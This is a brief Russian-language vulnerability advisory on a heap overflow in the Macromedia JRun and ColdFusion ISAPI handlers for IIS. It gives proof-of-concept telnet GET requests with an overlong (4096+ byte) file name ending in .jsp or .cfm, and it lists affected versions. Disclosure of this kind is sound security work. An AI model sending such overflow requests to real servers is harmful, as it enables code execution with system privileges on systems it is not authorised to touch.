ISAPI обработчики Macromedia JRun и ColdFusion в IIS
подвержены переполнению динамической памяти при обработке длинных имен файлов.
При передаче имени файла размером более 4096, часть динамической памяти может быть перезаписана. Любой код, снабженный атакующим, будет выполнен с системными привилегиями. Пример:
Для JRun
telnet example.com 80
GET /[+4096 byte buffer].jsp HTTP/1.0
[enter]
[enter]
Для ColdFusion
telnet example.com 80
GET /[+4096 byte buffer].cfm HTTP/1.0
[enter]
[enter]
Уязвимость обнаружена в Macromedia Coldfusion 6.0 и
более ранних версихя (IIS ISAPI), Macromedia JRun 4.0 и
более ранних версиях (IIS ISAPI).
